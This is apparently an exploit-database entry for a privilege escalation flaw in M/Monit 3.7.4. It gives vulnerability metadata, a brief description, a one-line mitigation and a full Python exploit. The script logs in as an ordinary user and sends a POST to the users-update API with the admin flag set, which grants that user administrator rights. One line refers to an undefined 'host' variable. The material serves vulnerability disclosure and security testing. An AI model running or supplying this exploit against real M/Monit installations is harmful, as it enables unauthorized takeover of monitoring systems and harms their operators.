M/Monit 3.7.4 - Privilege Escalation

vendor:

M/Monit

by:

Dolev Farhi

8.8

CVSS

HIGH

Privilege Escalation

269

CWE

Product Name: M/Monit

Affected Version From: 3.7.4

Affected Version To: 3.7.4

Patch Exists: YES

Related CWE: N/A

CPE: a:mmonit:mmonit:3.7.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2020

M/Monit 3.7.4 – Privilege Escalation

This exploit is a privilege escalation vulnerability in M/Monit 3.7.4. It allows an attacker to gain administrator privileges by sending a POST request to the '/api/1/admin/users/update' endpoint with the username, fullname, password, and admin flag set to 1. This will allow the attacker to gain full access to the M/Monit application.

Mitigation:

Ensure that the application is running the latest version of M/Monit and that all users have the least privileges necessary to perform their tasks.

Source

Exploit-DB raw data:

# Title: M/Monit 3.7.4 - Privilege Escalation
# Author: Dolev Farhi
# Date: 2020-07-09
# Vendor Homepage: https://mmonit.com/
# Version : 3.7.4

import sys
import requests

url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'

sess = requests.Session()
sess.get(host)

def login():
  print('Attempting to login...')
  data = {
    'z_username':username,
    'z_password':password
  }
  headers = {
    'Content-Type':'application/x-www-form-urlencoded'
  }
  
  resp = sess.post(url + '/z_security_check', data=data, headers=headers)
  if resp.ok:
    print('Logged in successfully.')
  else:
    print('Could not login.')
    sys.exit(1)

def privesc():
  data = {
    'uname':username,
    'fullname':username,
    'password':password,
    'admin':1
  }
  resp = sess.post(url + '/api/1/admin/users/update', data=data)
  
  if resp.ok:
    print('Escalated to administrator.')
  else:
    print('Unable to escalate to administrator.')
  
  return

if __name__ == '__main__':
  login()
  privesc()